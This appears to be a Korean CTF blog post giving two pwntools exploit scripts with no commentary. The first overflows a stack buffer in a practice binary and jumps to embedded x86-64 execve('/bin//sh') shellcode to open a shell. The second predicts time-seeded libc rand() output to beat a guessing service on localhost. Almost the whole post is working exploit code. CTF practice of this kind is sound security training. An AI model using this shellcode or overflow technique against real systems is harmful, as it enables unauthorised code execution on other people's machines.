728x90
쉬어가는 문제
pwn1.
from pwn import *
s = process("./pwn1")
elf = ELF("./pwn1")
stack = int(s.recv(14),16)
shell = "\x31\xF6\x56\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x54\x5F\xF7\xEE\xB0\x3B\x0F\x05"
print "stack : " + hex(stack)
gdb.attach(s, 'b *0x4005A3')
pay = "A"*(0x10+8)
pay += p64(stack+0x20)
pay += shell
s.sendline(pay)
s.interactive()
pwn2.
from math import *
from pwn import *
from ctypes import *
import time
s = remote("127.0.0.1",1123)
elf = ELF("./third")
libc = CDLL("libc.so.6")
v3 = libc.time(0)
print v3
libc.srand(v3)
for i in range(0,35):
v7 = libc.rand() & 0xf
print str(v7)
s.sendline(str(v7))
s.interactive()
'PWN > CTF' 카테고리의 다른 글
| [ISITDTU 2018] dead_note_lv2 (0) | 2018.12.20 |
|---|---|
| [bsidessf-ctf-2017] shortest (0) | 2018.12.02 |
| [Codegate 2017] BaskinRobins31 (0) | 2018.11.30 |
| [CSAW 2016] tutorial (0) | 2018.11.29 |
| [SHARIF 2018] OldSchool-newAge (0) | 2018.11.25 |